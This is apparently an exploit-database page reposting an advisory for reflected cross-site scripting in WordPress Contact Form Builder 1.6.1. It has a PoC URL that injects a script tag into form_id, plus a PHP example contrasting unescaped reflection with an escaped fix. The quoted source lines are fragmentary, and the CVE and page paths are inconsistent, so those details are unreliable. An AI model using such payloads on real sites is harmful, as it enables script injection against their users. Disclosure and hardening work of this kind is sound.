Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting

CVE: CVE-2018-15496
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-03-24
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
EPSS: 0.5
EPSSP: 0.7


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030132

Below is a copy:

Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting
* Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting
* Google Dork: N/A
* Date: 2020.03.23
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/contact-forms-builder/
* Software Link: https://wordpress.org/plugins/contact-forms-builder/
* Category: webapps
* Version: 1.6.1
* Tested on: Windows 10, Firefox
* CVE: N/A

Vulnerable page:
/edit-form.php


Vulnerable Source:
    1094: echo $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // request URI written into the page without escaping
    130: if(isset($_GET['form_id']))                             // form_id is read from the query string
    1094: if(!empty($cancel_redirect_url)) else

PoC:
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
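An added illustration of the reflected-output pattern above next to a hardened version; this is not code from the plugin or from the advisory author. It is plain PHP (inside WordPress the same escaping is done by esc_attr()/esc_url()), and the anchor-tag output context, the relative /edit-form.php path and the constructed request are assumptions.

```php
<?php
// Added example, not the plugin's code. Runs stand-alone with `php example.php`.
declare(strict_types=1);

// Vulnerable pattern from the advisory: the request URI is written into the
// page verbatim, so whatever the browser put in the query string is reflected
// into the HTML as live markup. (Anchor-tag context is assumed.)
function cancel_url_vulnerable(array $server): string
{
    return '<a href="http://' . $server['HTTP_HOST'] . $server['REQUEST_URI'] . '">Cancel</a>';
}

// Hardened: accept form_id only as a positive integer, rebuild the URL from a
// fixed relative path plus the validated value (HTTP_HOST is client-supplied
// too, so it is not used), and escape for the HTML attribute context.
function cancel_url_hardened(array $get): ?string
{
    $raw = $get['form_id'] ?? '';
    if (!is_string($raw) || !ctype_digit($raw) || $raw === '0') {
        return null;   // not a valid id: render nothing rather than reflect the input
    }
    $url = '/edit-form.php?form_id=' . (int) $raw;   // relative path is an assumption
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Cancel</a>';
}

// Constructed request mirroring the advisory's PoC URL.
$server = [
    'HTTP_HOST'   => 'localhost',
    'REQUEST_URI' => "/code_generator.php?form_id=<script>alert('xss')</script>",
];
$get = ['form_id' => "<script>alert('xss')</script>"];

echo cancel_url_vulnerable($server), PHP_EOL;   // script tag lands in the HTML unescaped
var_dump(cancel_url_hardened($get));            // NULL: the injected value is rejected
var_dump(cancel_url_hardened(['form_id' => '42']));
// string(49) "<a href="/edit-form.php?form_id=42">Cancel</a>"
```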


************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : [email protected]
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************

Copyright ©2024 Exploitalert.